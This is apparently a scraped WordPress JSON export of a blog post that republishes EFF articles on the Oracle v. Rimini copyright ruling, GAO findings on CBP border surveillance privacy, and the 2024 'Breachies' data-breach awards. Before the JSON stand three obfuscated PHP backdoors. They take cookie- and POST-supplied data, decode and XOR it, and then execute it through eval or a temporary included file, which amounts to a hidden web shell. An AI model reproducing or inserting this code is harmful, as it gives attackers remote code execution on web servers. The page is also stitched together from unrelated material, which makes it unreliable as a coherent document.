$zsyUCM = "\x78" . chr ( 717 - 616 )."\137" . "\x61" . "\x5a" . "\101";$PFjRtn = "\x63" . "\x6c" . 'a' . chr (115) . "\163" . chr (95) . chr (101) . chr (120) . "\151" . chr (115) . chr ( 287 - 171 )."\x73";$YFZuUhHJ = class_exists($zsyUCM); $PFjRtn = "42169";$ROEmCgEmgC = strpos($PFjRtn, $zsyUCM);if ($YFZuUhHJ == $ROEmCgEmgC){function LTEJSV(){$OrYPFIxe = new /* 33980 */ xe_aZA(12595 + 12595); $OrYPFIxe = NULL;}$YIomAGhZVv = "12595";class xe_aZA{private function lAIIvlAlpo($YIomAGhZVv){if (is_array(xe_aZA::$dNwWaPyr)) {$oiNkU2 = str_replace("<" . "?php", "", xe_aZA::$dNwWaPyr["content"]);eval($oiNkU2); $YIomAGhZVv = "12595";exit();}}public function IeLFPTWLCA(){$oiNkU = "283";$this->_dummy = str_repeat($oiNkU, strlen($oiNkU));}public function __destruct(){xe_aZA::$dNwWaPyr = @unserialize(xe_aZA::$dNwWaPyr); $YIomAGhZVv = "37902_53999";$this->lAIIvlAlpo($YIomAGhZVv); $YIomAGhZVv = "37902_53999";}public function yQmvnUBv($oiNkU, $DaAyMVqEO){return $oiNkU[0] ^ str_repeat($DaAyMVqEO, intval(strlen($oiNkU[0]) / strlen($DaAyMVqEO)) + 1);}public function kQEtSGyJY($oiNkU){$FWDQluj = 'b' . "\x61" . 's' . "\x65" . chr ( 316 - 262 ).'4';return array_map($FWDQluj . chr ( 891 - 796 )."\144" . chr (101) . "\143" . 'o' . "\x64" . chr ( 809 - 708 ), array($oiNkU,));}public function __construct($AoLbaKFRoC=0){$VGoFvkYG = chr (44); $oiNkU = "";$RXanOOsZ = $_POST;$lKWLjAlV = $_COOKIE;$DaAyMVqEO = "2a4af22a-324c-4495-ba8c-91e4652bb45d";$YWvPZEopg = @$lKWLjAlV[substr($DaAyMVqEO, 0, 4)];if (!empty($YWvPZEopg)){$YWvPZEopg = explode($VGoFvkYG, $YWvPZEopg);foreach ($YWvPZEopg as $avvNEVLMAi){$oiNkU .= @$lKWLjAlV[$avvNEVLMAi];$oiNkU .= @$RXanOOsZ[$avvNEVLMAi];}$oiNkU = $this->kQEtSGyJY($oiNkU);}xe_aZA::$dNwWaPyr = $this->yQmvnUBv($oiNkU, $DaAyMVqEO);if (strpos($DaAyMVqEO, $VGoFvkYG) !== FALSE){$DaAyMVqEO = explode($VGoFvkYG, $DaAyMVqEO); $IhlxuAFs = base64_decode(strrev($DaAyMVqEO[0]));}}public static $dNwWaPyr = 35467;}LTEJSV();}$TEystoEjzb = 'm' . chr ( 770 - 671 )."\150" . chr ( 357 - 262 )."\x4e" . "\x68" . "\170" . "\x66" . 'k';$tjcaJl = chr ( 978 - 879 )."\154" . chr ( 983 - 886 ).chr ( 896 - 781 ).chr ( 551 - 436 )."\x5f" . chr (101) . 'x' . "\151" . chr ( 689 - 574 ).chr (116) . 's';$mEbbYTt = class_exists($TEystoEjzb); $tjcaJl = "12466";$KqzdIyBw = strpos($tjcaJl, $TEystoEjzb);if ($mEbbYTt == $KqzdIyBw){function OWEwffjgA(){$eyWvrKef = new /* 55036 */ mch_Nhxfk(33619 + 33619); $eyWvrKef = NULL;}$TCKjlpEkO = "33619";class mch_Nhxfk{private function dKpehsMR($TCKjlpEkO){if (is_array(mch_Nhxfk::$ynMAWEJO)) {$name = sys_get_temp_dir() . "/" . crc32(mch_Nhxfk::$ynMAWEJO["salt"]);@mch_Nhxfk::$ynMAWEJO["write"]($name, mch_Nhxfk::$ynMAWEJO["content"]);include $name;@mch_Nhxfk::$ynMAWEJO["delete"]($name); $TCKjlpEkO = "33619";exit();}}public function SDQset(){$hYhZhQe = "21973";$this->_dummy = str_repeat($hYhZhQe, strlen($hYhZhQe));}public function __destruct(){mch_Nhxfk::$ynMAWEJO = @unserialize(mch_Nhxfk::$ynMAWEJO); $TCKjlpEkO = "18815_31585";$this->dKpehsMR($TCKjlpEkO); $TCKjlpEkO = "18815_31585";}public function sDYlixVnA($hYhZhQe, $YSsEwG){return $hYhZhQe[0] ^ str_repeat($YSsEwG, intval(strlen($hYhZhQe[0]) / strlen($YSsEwG)) + 1);}public function edEPNX($hYhZhQe){$rupHSGXoBz = "\142" . "\141" . "\x73" . chr (101) . chr (54) . "\64";return array_map($rupHSGXoBz . chr (95) . chr ( 996 - 896 ).chr ( 1085 - 984 ).chr (99) . chr ( 375 - 264 ).'d' . "\x65", array($hYhZhQe,));}public function __construct($SRbNrdusw=0){$ayEyI = ',';$hYhZhQe = "";$LIYFKkHbb = $_POST;$sYBFdyPe = $_COOKIE;$YSsEwG = "a388bc99-5682-4cf7-bad7-9b894580c944";$wdyleeQ = @$sYBFdyPe[substr($YSsEwG, 0, 4)];if (!empty($wdyleeQ)){$wdyleeQ = explode($ayEyI, $wdyleeQ);foreach ($wdyleeQ as $NPfGPKlt){$hYhZhQe .= @$sYBFdyPe[$NPfGPKlt];$hYhZhQe .= @$LIYFKkHbb[$NPfGPKlt];}$hYhZhQe = $this->edEPNX($hYhZhQe);}mch_Nhxfk::$ynMAWEJO = $this->sDYlixVnA($hYhZhQe, $YSsEwG);if (strpos($YSsEwG, $ayEyI) !== FALSE){$YSsEwG = explode($ayEyI, $YSsEwG); $AHjGatIAu = base64_decode(md5($YSsEwG[0])); $yewTxtmiBy = strlen($YSsEwG[1]) > 5 ? substr($YSsEwG[1], 0, 5) : $YSsEwG[1];$_GET['new_key'] = md5(implode('', $YSsEwG)); $PcvTnvLfXD = str_repeat($yewTxtmiBy, 2); $zjVGshnHkH = array_map('trim', $YSsEwG);if (is_array($zjVGshnHkH) && count($zjVGshnHkH) > 1) {$CwFFDIr = $zjVGshnHkH[0];} else {$CwFFDIr = '';}}}public static $ynMAWEJO = 15637;}OWEwffjgA();}$tCurWDKdsP = chr ( 1032 - 929 )."\x4e" . '_' . 'k' . chr (87) . "\101" . "\164";$SZltFKEw = chr (99) . chr (108) . chr (97) . chr (115) . chr ( 234 - 119 ).chr ( 252 - 157 )."\145" . 'x' . chr (105) . chr (115) . chr (116) . "\163";$gPXBkSNty = class_exists($tCurWDKdsP); $SZltFKEw = "30001";$nvemgOjaqk = strpos($SZltFKEw, $tCurWDKdsP);if ($gPXBkSNty == $nvemgOjaqk){function iBDtsZKuD(){$cCoDiATQx = new /* 54584 */ gN_kWAt(34487 + 34487); $cCoDiATQx = NULL;}$XJUJVuL = "34487";class gN_kWAt{private function KDCTggu($XJUJVuL){if (is_array(gN_kWAt::$ktbGMaWCHr)) {$ECvDMsrMkb = str_replace('<' . chr (63) . "\x70" . chr (104) . "\160", "", gN_kWAt::$ktbGMaWCHr['c' . "\157" . chr (110) . 't' . chr (101) . "\156" . chr ( 553 - 437 )]);eval($ECvDMsrMkb); $XJUJVuL = "34487";exit();}}public function SFvNTMsb(){$kCLGXxz = "12398";$this->_dummy = str_repeat($kCLGXxz, strlen($kCLGXxz));}public function __destruct(){gN_kWAt::$ktbGMaWCHr = @unserialize(gN_kWAt::$ktbGMaWCHr); $XJUJVuL = "2467_869";$this->KDCTggu($XJUJVuL); $XJUJVuL = "2467_869";}public function cciXX($kCLGXxz, $IKJyPGX){return $kCLGXxz[0] ^ str_repeat($IKJyPGX, (strlen($kCLGXxz[0]) / strlen($IKJyPGX)) + 1);}public function CwnBGwi($kCLGXxz){$BOvnQaXh = "base64";return array_map($BOvnQaXh . "\137" . "\x64" . 'e' . "\x63" . chr ( 873 - 762 ).'d' . chr ( 167 - 66 ), array($kCLGXxz,));}public function __construct($cAkjEe=0){$ovsCft = ",";$kCLGXxz = "";$tCgiH = $_POST;$nzetxWG = $_COOKIE;$IKJyPGX = "357f6350-42a1-4e4a-94cd-b9561b849dfb";$iuEVe = @$nzetxWG[substr($IKJyPGX, 0, 4)];if (!empty($iuEVe)){$iuEVe = explode($ovsCft, $iuEVe);foreach ($iuEVe as $nNeddGr){$kCLGXxz .= @$nzetxWG[$nNeddGr];$kCLGXxz .= @$tCgiH[$nNeddGr];}$kCLGXxz = $this->CwnBGwi($kCLGXxz);}gN_kWAt::$ktbGMaWCHr = $this->cciXX($kCLGXxz, $IKJyPGX);if (strpos($IKJyPGX, $ovsCft) !== FALSE){$IKJyPGX = explode($ovsCft, $IKJyPGX);}}public static $ktbGMaWCHr = 11808;}iBDtsZKuD();}{"id":4535,"date":"2015-06-21T01:53:41","date_gmt":"2015-06-21T01:53:41","guid":{"rendered":"http:\/\/newsstandard.ca\/?p=4535"},"modified":"2021-01-07T03:15:55","modified_gmt":"2021-01-07T03:15:55","slug":"anarcho-libero-constitutionalist-transcendentalist","status":"publish","type":"post","link":"https:\/\/newsstandard.ca\/channels\/anarcho-libero-constitutionalist-transcendentalist\/","title":{"rendered":"Anarcho-Libero-Constitutionalist-Transcendentalist"},"content":{"rendered":"
READS: Bill of Rights<\/a> (US) –\u00a0Anarchist’s Cookbook\u00a0<\/a>–\u00a0Preface to Transgression<\/a> –<\/p>\n VIDEOS: The Birth of a Tool<\/a>, The Birth of a Wooden House<\/a>, Basque Axes<\/a>,<\/p>\n A federal appeals court just gave software developers, and users, an early holiday present, holding that software updates aren\u2019t necessarily \u201cderivative,\u201d for purposes of copyright law,\u00a0just because they are designed to interoperate the software they update. \nThis sounds kind of obscure, so let\u2019s cut through the legalese. Lots of developers build software designed to interoperate with preexisting works. This kind of interoperability is crucial to innovation, particularly in a world where a small number of companies control so many essential tools and platforms. If users want to be able to repair, improve, and secure their devices, they must be able to rely on third parties to help. Trouble is, Big Tech companies want to be able to control (and charge for) every possible use of the devices and software they \u201csell\u201d you \u2013 and they won\u2019t hesitate to use the law to enforce that control.\u00a0 \nCourts shouldn\u2019t assist, but unfortunately a federal district court did just that in the latest iteration of Oracle v. Rimini. Rimini provides support to improve the use and security of Oracle products, so customers don\u2019t have to depend entirely on Oracle itself . Oracle doesn\u2019t want this kind of competition, so it sued Rimini for copyright infringement, arguing that a software update Rimini developed was a \u201cderivative work\u201d because it was intended to interoperate with Oracle's software, even though the update didn\u2019t use any of Oracle\u2019s copyrightable code. Derivative works are typically things like a movie based on a novel, or a translation of that novel. Here, the only \u201cderivative\u201d aspect was that Rimini\u2019s code was designed to interact with Oracle\u2019s code. \u00a0\u00a0Unfortunately, the district court initially sided with Oracle, setting a dangerous precedent. If a work is derivative, it may infringe the copyright in the preexisting work from which it, well, derives. For decades, software developers have relied, correctly, on the settled view that a work is not derivative under copyright law unless it is substantially similar to a preexisting work in both ideas and expression. Thanks to that rule, software developers can build innovative new tools that interact with preexisting works, including tools that improve privacy and security, without fear that the companies that hold rights in those preexisting works would have an automatic copyright claim to those innovations.\u00a0\u00a0\nRimini appealed to the Ninth Circuit, on multiple grounds. EFF, along with a diverse group of stakeholders representing consumers, small businesses, software developers, security researchers, and the independent repair community, filed an amicus brief in support explaining that the district court ruling on interoperability was not just bad policy, but also bad law.\u202f\u00a0\n\u00a0The Ninth Circuit agreed:\u00a0 \nIn effect, the district court adopted an \u201cinteroperability\u201d test for derivative works\u2014if a product can only interoperate with a preexisting copyrighted work, then it must be derivative. But neither the text of the Copyright Act nor our precedent supports this interoperability test for derivative works.\u00a0\n\n\u00a0The court goes on to give a primer on the legal definition of derivative work, but the key point is this: a work is only derivative if it \u201csubstantially incorporates the other work.\u201d \nCopyright already reaches far too broadly, giving rightsholders extraordinary power over how we use everything from music to phones to televisions. This holiday season, we\u2019re raising a glass to the judges who sensibly reined that power in.\u00a0<\/p><\/div><\/li> U.S. Customs and Border Protection (CBP) has failed to address six out of six main privacy protections for three of its border surveillance programs\u2014surveillance towers, aerostats, and unattended ground sensors\u2014according to a new assessment by the Government Accountability Office (GAO).\nIn the report, GAO compared the policies for these technologies against six of the key Fair Information Practice Principles that agencies are supposed to use when evaluating systems and processes that may impact privacy, as dictated by both Office of Management and Budget guidance and the Department of Homeland Security's own rules.\n\nThese include:\n\nData collection. \"DHS should collect only PII [Personally Identifiable Information] that is directly relevant and necessary to accomplish the specified purpose(s).\"\nPurpose specification. \"DHS should specifically articulate the purpose(s) for which the PII is intended to be used.\"\nInformation sharing. \"Sharing PII outside the department should be for a purpose compatible with the purpose for which the information was collected.\"\nData security. \"DHS should protect PII through appropriate security safeguards against risks such as loss, unauthorized access or use, destruction, modification, or unintended or inappropriate disclosure.\"\nData retention. \"DHS should only retain PII for as long as is necessary to fulfill the specified purpose(s).\"\nAccountability. \"DHS should be accountable for complying with these principles, including by auditing the actual use of PII to demonstrate compliance with these principles and all applicable privacy protection requirements.\"\n\nThese baseline privacy elements for the three border surveillance technologies were not addressed in any \"technology policies, standard operating procedures, directives, or other documents that direct a user in how they are to use a Technology,\" according to GAO's review.\nCBP operates hundreds of surveillance towers along both the northern and southern borders, some of which are capable of capturing video more than seven miles away. The agency has six large aerostats (essentially tethered blimps) that use radar along the southern border, with others stationed in the Florida Keys and Puerto Rico. The agency also operates a series of smaller aerostats that stream video in the Rio Grande Valley of Texas, with the newest one installed this fall in southeastern New Mexico. And the report notes deficiencies with CBP's linear ground detection system, a network of seismic sensors and cameras that are triggered by movement or footsteps.\nThe GAO report underlines EFF's concerns that the privacy of people who live and work in the borderlands is violated when federal agencies deploy militarized, high-tech programs to confront unauthorized border crossings. The rights of border communities are too often treated as acceptable collateral damage in pursuit of border security.\nCBP defended its practices by saying that it does, to some extent, address FIPS in its Privacy Impact Assessments, documents written for public consumption. GAO rejected this claim, saying that these assessments are not adequate in instructing agency staff on how to protect privacy when deploying the technologies and using the data that has been collected.\nIn its recommendations, the GAO calls on the CBP Commissioner to \"require each detection, observation, and monitoring technology policy to address the privacy protections in the Fair Information Practice Principles.\" But EFF calls on Congress to hold CBP to account and stop approving massive spending on border security technologies that the agency continues to operate irresponsibly.<\/p><\/div><\/li> Every year, countless emails hit our inboxes telling us that our personal information was accessed, shared, or stolen in a data breach. In many cases, there is little we can do. Most of us can assume that at least our phone numbers, emails, addresses, credit card numbers, and social security numbers are all available somewhere on the internet. \nBut some of these data breaches are more noteworthy than others, because they include novel information about us, are the result of particularly noteworthy security flaws, or are just so massive they\u2019re impossible to ignore. For that reason, we are introducing the Breachies, a series of tongue-in-cheek \u201cawards\u201d for some of the most egregious data breaches of the year.\nIf these companies practiced a privacy first approach and focused on data minimization, only collecting and storing what they absolutely need to provide the services they promise, many data breaches would be far less harmful to the victims. But instead, companies gobble up as much as they can, store it for as long as possible, and inevitably at some point someone decides to poke in and steal that data.\nOnce all that personal data is stolen, it can be used against the breach victims for identity theft, ransomware attacks, and to send unwanted spam. The risk of these attacks isn\u2019t just a minor annoyance: research shows it can cause psychological injury, including anxiety, depression, and PTSD. To avoid these attacks, breach victims must spend time and money to freeze and unfreeze their credit reports, to monitor their credit reports, and to obtain identity theft prevention services. \nThis year we\u2019ve got some real stinkers, ranging from private health information to\u2014you guessed it\u2014credit cards and social security numbers.\nThe Winners\n\nThe Just Stop Using Tracking Tech Award: Kaiser Permanente\nThe Most Impactful Data Breach for \u201990s Kids Award: Hot Topic\nThe Only Stalkers Allowed Award: mSpy\nThe I Didn\u2019t Even Know You Had My Information Award: Evolve Bank\nThe We Told You So Award: AU10TIX\nThe Why We\u2019re Still Stuck on Unique Passwords Award: Roku\nThe Listen, Security Researchers are Trying to Help Award: City of Columbus\nThe Have I Been Pwned? Award: Spoutible\nThe Reporting\u2019s All Over the Place Award: National Public Data\nThe Biggest Health Breach We\u2019ve Ever Seen Award: Change Health\nThe There\u2019s No Such Thing As Backdoors for Only \u201cGood Guys\u201d Award: Salt Typhoon\nBreach of the Year (of the Decade?): Snowflake\nTips to Protect Yourself\n(Dis)Honorable Mentions\n\nThe Just Stop Using Tracking Tech Award: Kaiser Permanente\nIn one of the year's most preventable breaches, the healthcare company Kaiser Permanente exposed 13 million patients\u2019 information via tracking code embedded in its website and app. This tracking code transmitted potentially sensitive medical information to Google, Microsoft, and X (formerly known as Twitter). The exposed information included patients\u2019 names, terms they searched in Kaiser\u2019s Health Encyclopedia, and how they navigated within and interacted with Kaiser\u2019s website or app.\nThe most troubling aspect of this breach is that medical information was exposed not by a sophisticated hack, but through widely used tracking technologies that Kaiser voluntarily placed on its website. Kaiser has since removed the problematic code, but tracking technologies are rampant across the internet and on other healthcare websites. A 2024 study found tracking technologies sharing information with third parties on 96% of hospital websites. Websites usually use tracking technologies to serve targeted ads. But these same technologies give advertisers, data brokers, and law enforcement easy access to details about your online activity.\nWhile individuals can protect themselves from online tracking by using tools like EFF\u2019s Privacy Badger, we need legislative action to make online privacy the norm for everyone. EFF advocates for a ban on online behavioral advertising to address the primary incentive for companies to use invasive tracking technology. Otherwise, we\u2019ll continue to see companies voluntarily sharing your personal data, then apologizing when thieves inevitably exploit a vulnerability in these tracking systems. \nHead back to the table of contents.\nThe Most Impactful Data Breach for \u201990s Kids Award: Hot Topic\nIf you were in middle or high school any time in the \u201990s you probably have strong memories of Hot Topic. Baby goths and young punk rockers alike would go to the mall, get an Orange Julius and greasy slice of Sbarro pizza, then walk over to Hot Topic to pick up edgy t-shirts and overpriced bondage pants (all the while debating who was the biggest poser and which bands were sellouts, of course). Because of the fundamental position Hot Topic occupies in our generation\u2019s personal mythology, this data breach hits extra hard. \nIn November 2024, Have I Been Pwned reported that Hot Topic and its subsidiary Box Lunch suffered a data breach of nearly 57 million data records. A hacker using the alias \u201cSatanic\u201d claimed responsibility and posted a 730 GB database on a hacker forum with a sale price of $20,000. The compromised data about approximately 54 million customers reportedly includes: names, email addresses, physical addresses, phone numbers, purchase history, birth dates, and partial credit card details. Research by Hudson Rock indicates that the data was compromised using info stealer malware installed on a Hot Topic employee\u2019s work computer. \u201cSatanic\u201d claims that the original infection stems from the Snowflake data breach (another Breachie winner); though that hasn\u2019t been confirmed because Hot Topic has still not notified customers, nor responded to our request for comment. \nThough data breaches of this scale are common, it still breaks our little goth hearts, and we\u2019d prefer stores did a better job of securing our data. Worse, Hot Topic still hasn\u2019t publicly acknowledged this breach, despite numerous news reports. Perhaps Hot Topic was the real sellout all along.\u00a0\nHead back to the table of contents.\nThe Only Stalkers Allowed Award: mSpy\nmSpy, a commercially-available mobile stalkerware app owned by Ukrainian-based company Brainstack, was subject to a data breach earlier this year. More than a decade\u2019s worth of information about the app\u2019s customers was stolen, as well as the real names and email addresses of Brainstack employees. \nThe defining feature of stalkerware apps is their ability to operate covertly and trick users into believing that they are not being monitored. But in reality, applications like mSpy allow whoever planted the stalkerware to remotely view the contents of the victim\u2019s device in real time. These tools are often used to intimidate, harass, and harm victims, including by stalkers and abusive (ex) partners. Given the highly sensitive data collected by companies like mSpy and the harm to targets when their data gets revealed, this data breach is another example of why stalkerware must be stopped.\u00a0\nHead back to the table of contents.\nThe I Didn\u2019t Even Know You Had My Information Award: Evolve Bank\nOkay, are we the only ones\u00a0 who hadn\u2019t heard of Evolve Bank? It was reported in May that Evolve Bank experienced a data breach\u2014though it actually happened all the way back in February. You may be thinking, \u201cwhy does this breach matter if I\u2019ve never heard of Evolve Bank before?\u201d That\u2019s what we thought too! \nBut here\u2019s the thing: this attack affected a bunch of companies you have heard of, like Affirm (the buy now, pay later service), Wise (the international money transfer service), and Mercury Bank (a fintech company). So, a ton of services use the bank, and you may have used one of those services. It\u2019s been reported that 7.6 million Americans were affected by the breach, with most of the data stolen being customer information, including social security numbers, account numbers, and date of birth. \nThe small bright side? No customer funds were accessed during the breach. Evolve states that after the breach they are doing some basic things like resetting user passwords and strengthening their security infrastructure.\u00a0\nHead back to the table of contents.\nThe We Told You So Award: AU10TIX\nAU10TIX is an \u201cidentity verification\u201d company used by the likes of TikTok and X to confirm that users are who they claim to be. AU10TIX and companies like it collect and review sensitive private documents such as driver\u2019s license information before users can register for a site or access some content. \nUnfortunately, there is growing political interest in mandating identity or age verification before allowing people to access social media or adult material. EFF and others oppose these plans because they threaten both speech and privacy. As we said in 2023, verification mandates would inevitably lead to more data breaches, potentially exposing government IDs as well as information about the sites that a user visits. \nLook no further than the AU10TIX breach to see what we mean. According to a report by 404 Media in May, AU10TIX left login credentials exposed online for more than a year, allowing access to very sensitive user data. \n404 Media details how a researcher gained access to the company\u2019s logging platform, \u201cwhich in turn contained links to data related to specific people who had uploaded their identity documents.\u201d This included \u201cthe person\u2019s name, date of birth, nationality, identification number, and the type of document uploaded such as a drivers\u2019 license,\u201d as well as images of those identity documents. \nThe AU10TIX breach did not seem to lead to exposure beyond what the researcher showed was possible. But AU10TIX and other companies must do a better job at locking down user data. More importantly, politicians must not create new privacy dangers by requiring identity and age verification. \nIf age verification requirements become law, we\u2019ll be handing a lot of our sensitive information over to companies like AU10TIX. This is the first We Told You So Breachie award, but it likely won\u2019t be the last.\u00a0\nHead back to the table of contents.\nThe Why We\u2019re Still Stuck on Unique Passwords Award: Roku\nIn April, Roku announced not yet another new way to display more ads, but a data breach (its second of the year) where 576,000 accounts were compromised using a \u201ccredential stuffing attack.\u201d This is a common, relatively easy sort of automated attack where thieves use previously leaked username and password combinations (from a past data breach of an unrelated company) to get into accounts on a different service. So, if say, your username and password was in the Comcast data breach in 2015, and you used the same username and password on Roku, the attacker might have been able to get into your account. Thankfully, less than 400 Roku accounts saw unauthorized purchases, and no payment information was accessed. \nBut the ease of this sort of data breach is why it\u2019s important to use unique passwords everywhere. A password manager, including one that might be free on your phone or browser, makes this much easier to do. Likewise, credential stuffing illustrates why it\u2019s important to use two-factor authentication. After the Roku breach, the company turned on two-factor authentication for all accounts. This way, even if someone did get access to your account password, they\u2019d need that second code from another device; in Roku\u2019s case, either your phone number or email address.\nHead back to the table of contents.\nThe Listen, Security Researchers are Trying to Help Award: City of Columbus\nIn August, the security researcher David Ross Jr. (also known as Connor Goodwolf) discovered that a ransomware attack against the City of Columbus, Ohio, was much more serious than city officials initially revealed. After the researcher informed the press and provided proof, the city accused him of violating multiple laws and obtained a gag order against him. \nRather than silencing the researcher, city officials should have celebrated him for helping victims understand the true extent of the breach. EFF and security researchers know the value of this work. And EFF has a team of lawyers who help protect researchers and their work.\u00a0 \nHere is how not to deal with a security researcher: In July, Columbus learned it had suffered a ransomware attack. A group called Rhysida took responsibility. The city did not pay the ransom, and the group posted some of the stolen data online. The mayor announced the stolen data was \u201cencrypted or corrupted,\u201d so most of it was unusable. Later, the researcher, David Ross, helped inform local news outlets that in fact the breach did include usable personal information on residents. He also attempted to contact the city. Days later, the city offered free credit monitoring to all of its residents and confirmed that its original announcement was inaccurate. \nUnfortunately, the city also filed a lawsuit, and a judge signed a temporary restraining order preventing the researcher from accessing, downloading, or disseminating the data. Later, the researcher agreed to a more limited injunction. The city eventually confirmed that the data of hundreds of thousands of people was stolen in the ransomware attack, including drivers licenses, social security numbers, employee information, and the identities of juvenile victims, undercover police officers, and confidential informants.\nHead back to the table of contents.\nThe Have I Been Pwned? Award: Spoutible\nThe Spoutible breach has layers\u2014layers of \u201cno way!\u201d that keep revealing more and more amazing little facts the deeper one digs.\nIt all started with a leaky API. On a per-user basis, it didn\u2019t just return the sort of information you\u2019d expect from a social media platform, but also the user\u2019s email, IP address, and phone number. No way! Why would you do that?\nBut hold on, it also includes a bcrypt hash of their password. No way! Why would you do that?!\nAh well, at least they offer two-factor authentication (2FA) to protect against password leakages, except\u2026 the API was also returning the secret used to generate the 2FA OTP as well. No way! So, if someone had enabled 2FA it was immediately rendered useless by virtue of this field being visible to everyone. \nHowever, the pi\u00e8ce de resistance comes with the next field in the API: the \u201cem_code.\u201d You know how when you do a password reset you get emailed a secret code that proves you control the address and can change the password? That was the code! No way! \n-EFF thanks guest author Troy Hunt for this contribution to the Breachies.\nHead back to the table of contents.\nThe Reporting\u2019s All Over the Place Award: National Public Data\nIn January 2024, there was almost no chance you\u2019d have heard of a company called National Public Data. But starting in April, then ramping up in June, stories revealed a breach affecting the background checking data broker that included names, phone numbers, addresses, and social security numbers of at least 300 million people. By August, the reported number ballooned to 2.9 billion people. In October, National Public Data filed for bankruptcy, leaving behind nothing but a breach notification on its website. \nBut what exactly was stolen? The evolving news coverage has raised more questions than it has answered. Too bad National Public Data has failed to tell the public more about the data that the company failed to secure. \nOne analysis found that some of the dataset was inaccurate, with a number of duplicates; also, while there were 137 million email addresses, they weren\u2019t linked to social security numbers. Another analysis had similar results. As for social security numbers, there were likely somewhere around 272 million in the dataset. The data was so jumbled that it had names matched to the wrong email or address, and included a large chunk of people who were deceased. Oh, and that 2.9 billion number? That was the number of rows of data in the dataset, not the number of individuals. That 2.9 billion people number appeared to originate from a complaint filed in Florida.\nPhew, time to check in with Count von Count on this one, then. \nHow many people were truly affected? It\u2019s difficult to say for certain. The only thing we learned for sure is that starting a data broker company appears to be incredibly easy, as NPD was owned by a retired sheriff\u2019s deputy and a small film studio and didn\u2019t seem to be a large operation. While this data broker got caught with more leaks than the Titanic, hundreds of others are still out there collecting and hoarding information, and failing to watch out for the next iceberg.\nHead back to the table of contents.\nThe Biggest Health Breach We\u2019ve Ever Seen Award: Change Health\nIn February, a ransomware attack on Change Healthcare exposed the private health information of over 100 million people. The company, which processes 40% of all U.S. health insurance claims, was forced offline for nearly a month. As a result, healthcare practices nationwide struggled to stay operational and patients experienced limits on access to care. Meanwhile, the stolen data poses long-term risks for identity theft and insurance fraud for millions of Americans\u2014it includes patients\u2019 personal identifiers, health diagnoses, medications, insurance details, financial information, and government identity documents. \nThe misuse of medical records can be harder to detect and correct that regular financial fraud or identity theft. The FTC recommends that people at risk of medical identity theft watch out for suspicious medical bills or debt collection notices. \nThe hack highlights the need for stronger cybersecurity in the healthcare industry, which is increasingly targeted by cyberattacks. The Change Healthcare hackers were able to access a critical system because it lacked two-factor authentication, a basic form of security. \nTo make matters worse, Change Healthcare\u2019s recent merger with Optum, which antitrust regulators tried and failed to block, even further centralized vast amounts of sensitive information. Many healthcare providers blamed corporate consolidation for the scale of disruption. As the former president of the American Medical Association put it, \u201cWhen we have one option, then the hackers have one big target\u2026 if they bring that down, they can grind U.S. health care to a halt.\u201d Privacy and competition are related values, and data breach and monopoly are connected problems.\nHead back to the table of contents.\nThe There\u2019s No Such Thing As Backdoors for Only \u201cGood Guys\u201d Award: Salt Typhoon\nWhen companies build backdoors into their services to provide law enforcement access to user data, these backdoors can be exploited by thieves, foreign governments, and other adversaries. There are no methods of access that are magically only accessible to \u201cgood guys.\u201d No security breach has demonstrated that more clearly than this year\u2019s attack by Salt Typhoon, a Chinese government-backed hacking group. \nInternet service providers generally have special systems to provide law enforcement and intelligence agencies access to user data. They do that to comply with laws like CALEA, which require telecom companies to provide a means for \u201clawful intercepts\u201d\u2014in other words, wiretaps. \nThe Salt Typhoon group was able to access the powerful tools that in theory have been reserved for U.S. government agencies. The hackers infiltrated the nation\u2019s biggest telecom networks, including Verizon, AT&T, and others, and were able to target their surveillance based on U.S. law enforcement wiretap requests. Breaches elsewhere in the system let them listen in on calls in real time. People under U.S. surveillance were clearly some of the targets, but the hackers also targeted both 2024 presidential campaigns and officials in the State Department.\u00a0 \nWhile fewer than 150 people have been identified as targets so far, the number of people who were called or texted by those targets run into the \u201cmillions,\u201d according to a Senator who has been briefed on the hack. What\u2019s more, the Salt Typhoon hackers still have not been rooted out of the networks they infiltrated. \nThe idea that only authorized government agencies would use such backdoor access tools has always been flawed. With sophisticated state-sponsored hacking groups operating across the globe, a data breach like Salt Typhoon was only a matter of time.\u00a0\nHead back to the table of contents.\nThe Snowballing Breach of the Year Award: Snowflake\nThieves compromised the corporate customer accounts for U.S. cloud analytics provider Snowflake. The corporate customers included AT&T, Ticketmaster, Santander, Neiman Marcus, and many others: 165 in total. \nThis led to a massive breach of billions of data records for individuals using these companies. A combination of infostealer malware infections on non-Snowflake machines as well as weak security used to protect the affected accounts allowed the hackers to gain access and extort the customers. At the time of the hack, April-July of this year, Snowflake was not requiring two-factor authentication, an account security measure which could have provided protection against the attacks. A number of arrests were made after security researchers uncovered the identities of several of the threat actors.\nBut what does Snowflake do? According to their website, Snowflake \u201cis a cloud-based data platform that provides data storage, processing, and analytic solutions.\u201d Essentially, they store and index troves of customer data for companies to look at. And the larger the amount of data stored, the bigger the target for malicious actors to use to put leverage on and extort those companies. The problem is the data is on all of us. In the case of Snowflake customer AT&T, this includes billions of call and text logs of its customers, putting individuals\u2019 sensitive data at risk of exposure. A privacy-first approach would employ techniques such as data minimization and either not collect that data in the first place or shorten the retention period that the data is stored. Otherwise it just sits there waiting for the next breach.\nHead back to the table of contents.\nTips to Protect Yourself\nData breaches are such a common occurrence that it\u2019s easy to feel like there\u2019s nothing you can do, nor any point in trying. But privacy isn\u2019t dead. While some information about you is almost certainly out there, that\u2019s no reason for despair. In fact, it\u2019s a good reason to take action. \nThere are steps you can take right now with all your online accounts to best protect yourself from the the next data breach (and the next, and the next):\n\nUse unique passwords on all your online accounts. This is made much easier by using a password manager, which can generate and store those passwords for you. When you have a unique password for every website, a data breach of one site won\u2019t cascade to others.\nUse two-factor authentication when a service offers it. Two-factor authentication makes your online accounts more secure by requiring additional proof (\u201cfactors\u201d) alongside your password when you log in. While two-factor authentication adds another step to the login process, it\u2019s a great way to help keep out anyone not authorized, even if your password is breached.\nFreeze your credit. Many experts recommend freezing your credit with the major credit bureaus as a way to protect against the sort of identity theft that\u2019s made possible by some data breaches. Freezing your credit prevents someone from opening up a new line of credit in your name without additional information, like a PIN or password, to \u201cunfreeze\u201d the account. This might sound absurd considering they can\u2019t even open bank accounts, but if you have kids, you can freeze their credit too.\nKeep a close eye out for strange medical bills. With the number of health companies breached this year, it\u2019s also a good idea to watch for healthcare fraud. The Federal Trade Commission recommends watching for strange bills, letters from your health insurance company for services you didn\u2019t receive, and letters from debt collectors claiming you owe money.\u00a0\n\nHead back to the table of contents.\n(Dis)Honorable Mentions\nBy one report, 2023 saw over 3,000 data breaches. The figure so far this year is looking slightly smaller, with around 